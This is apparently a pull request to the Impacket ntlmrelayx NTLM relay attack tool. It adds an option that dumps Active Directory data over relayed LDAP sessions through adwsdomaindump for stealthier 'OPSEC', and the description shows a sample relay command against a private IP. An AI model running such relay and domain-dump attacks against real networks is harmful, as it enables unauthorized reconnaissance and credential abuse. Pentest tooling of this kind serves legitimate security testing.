### PR TITLE
Added adwsdomaindump as ldapdomaindump alternative

### DIFF
--- a/examples/ntlmrelayx.py
+++ b/examples/ntlmrelayx.py
@@ -195,7 +195,7 @@ def start_servers(options, threads):
         c.setLootdir(options.lootdir)
         c.setOutputFile(options.output_file)
         c.setdumpHashes(options.dump_hashes)
-        c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access, options.dump_laps, options.dump_gmsa, options.dump_adcs, options.sid, options.add_dns_record)
+        c.setLDAPOptions(options.adwsdomaindump, options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access, options.dump_laps, options.dump_gmsa, options.dump_adcs, options.sid, options.add_dns_record)
         c.setRPCOptions(options.rpc_mode, options.rpc_use_smb, options.auth_smb, options.hashes_smb, options.rpc_smb_port, options.icpr_ca_name)
         c.setMSSQLOptions(options.query)
         c.setInteractive(options.interactive)
@@ -388,6 +388,7 @@ if __name__ == '__main__':
 
     #LDAP options
     ldapoptions = parser.add_argument_group("LDAP client options")
+    ldapoptions.add_argument('--adwsdomaindump', action='store_true', required=False, help='Instead of using ldapdomaindump use adwsdomaindump for better OPSEC')
     ldapoptions.add_argument('--no-dump', action='store_false', required=False, help='Do not attempt to dump LDAP information')
     ldapoptions.add_argument('--no-da', action='store_false', required=False, help='Do not attempt to add a Domain Admin')
     ldapoptions.add_argument('--no-acl', action='store_false', required=False, help='Disable ACL attacks')

--- a/impacket/examples/ntlmrelayx/attacks/ldapattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/ldapattack.py
@@ -909,14 +909,37 @@ class LDAPAttack(ProtocolAttack):
         #print self.client.entries
         global dumpedDomain
         global dumpedAdcs
-        # Set up a default config
-        domainDumpConfig = ldapdomaindump.domainDumpConfig()
 
-        # Change the output directory to configured rootdir
-        domainDumpConfig.basepath = self.config.lootdir
+        if self.config.adwsdomaindump:
+            try:
+                import adwsdomaindump
+                from ldap3.abstract.entry import Entry
+                def entry_get(self, attr, default=None):
+                    try:
+                        return self[attr].value
+                    except:
+                        return default
 
-        # Create new dumper object
-        domainDumper = ldapdomaindump.domainDumper(self.client.server, self.client, domainDumpConfig)
+                Entry.get = entry_get
+
+                domainDumpConfig = adwsdomaindump.domainDumpConfig()
+                domainDumpConfig.basepath = self.config.lootdir
+                domainDumper = adwsdomaindump.domainDumper(self.client.server, self.client, domainDumpConfig)
+
+            except ModuleNotFoundError:
+                LOG.error('adwsdomaindump not installed, falling back to ldapdomaindump')
+                domainDumpConfig = ldapdomaindump.domainDumpConfig()
+                domainDumpConfig.basepath = self.config.lootdir
+                domainDumper = ldapdomaindump.domainDumper(self.client.server, self.client, domainDumpConfig)
+        else:
+            # Set up a default config
+            domainDumpConfig = ldapdomaindump.domainDumpConfig()
+
+            # Change the output directory to configured rootdir
+            domainDumpConfig.basepath = self.config.lootdir
+
+            # Create new dumper object
+            domainDumper = ldapdomaindump.domainDumper(self.client.server, self.client, domainDumpConfig)
 
         if self.config.interactive:
             if self.tcp_shell is not None:

--- a/impacket/examples/ntlmrelayx/utils/config.py
+++ b/impacket/examples/ntlmrelayx/utils/config.py
@@ -192,7 +192,8 @@ class NTLMRelayxConfig:
     def setRandomTargets(self, randomtargets):
         self.randomtargets = randomtargets
 
-    def setLDAPOptions(self, dumpdomain, addda, aclattack, validateprivs, escalateuser, addcomputer, delegateaccess, dumplaps, dumpgmsa, dumpadcs, sid, adddnsrecord):
+    def setLDAPOptions(self, adwsdomaindump, dumpdomain, addda, aclattack, validateprivs, escalateuser, addcomputer, delegateaccess, dumplaps, dumpgmsa, dumpadcs, sid, adddnsrecord):
+        self.adwsdomaindump = adwsdomaindump
         self.dumpdomain = dumpdomain
         self.addda = addda
         self.aclattack = aclattack


### PR DESCRIPTION
Ldapdomaindump is fine most of the times however there's also [adwsdomaindump](https://github.com/mverschu/adwsdomaindump) which is OPSEC friendly.

By default ntlmrelayx still uses ldapdomaindump, however there's a new option in LDAP to use adwsdomaindump by using `--adwsdomaindump`

If adwsdomaindump it's not installed there's a warning but we fallback to ldapdomaindump.

Example:
```
(env) root@something://impacket# python3 examples/ntlmrelayx.py -smb2support -t ldap://192.168.30.250 --adwsdomaindump -debug --no-da --no-acl --lootdir /tmp/
```